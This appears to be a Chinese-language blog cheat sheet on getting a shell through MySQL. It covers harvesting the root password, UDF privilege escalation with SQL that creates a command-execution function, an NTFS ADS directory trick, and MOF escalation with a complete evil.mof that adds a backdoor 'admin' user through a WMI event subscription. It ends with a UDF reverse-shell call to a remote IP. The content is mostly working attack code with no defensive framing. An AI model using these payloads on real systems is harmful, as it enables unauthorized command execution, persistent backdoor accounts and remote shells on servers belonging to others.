Mysql数据库安全
Mysql getshell
获取root密码
- 从网站的配置文件中查找
- 下载存储了root密码密文的/MysqlCurrentRoot/mysql/user.myd文件,进行读取并解密
1. UDF提权
- 从上传的UDF动态链接库中创建函数
create function function_name returns string soname 'dll_path';
select function_name('execute cmd command or else');
drop function cmdshell;
delete from mysql.func where name='function_name'
-
如果遇到"Can't open shared library"的情况,就要使用NTFS ADS流来解决这个问题
a. 找到Mysql的目录select @@basedir;
b. 利用MTFS ADS流创建lib目录、plugin目录
select 'dll_path' into dumpfile 'c:\Program Files\MYSQL\MySQL Server5.1\lib::$INDEX_ALLOCATION'select 'dll_path' into dumpfile 'c:\Program Files\MYSQL\MySQL Server5.1\lib、、plugin::$INDEX_ALLOCATION'
-
如果mysql版本大于5.1,UDF.dll必须放置在mysql安装目录的lib\plugin文件夹下
-
如果mysql版本小于5.1,UDF.dll文件在
windows server 2003 下放置在c:\windwos\system32
windows server 2000 下放置在c:\winnt\system32
2. MOF提权
a. 上传evil.mof
b. 把文件导出到正确的位置
select load_file('uploaded evil.mof') into dumpfile 'c:\windows\system32\wbem\mof\evil.mof'
/*--------------------evil.mof-----------------*/
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
3. 利用UDF反弹端口提权
create function reverseshell returns string soname 'evil.sll';
select reverseshell(remoteip,port)
浙公网安备 33010602011771号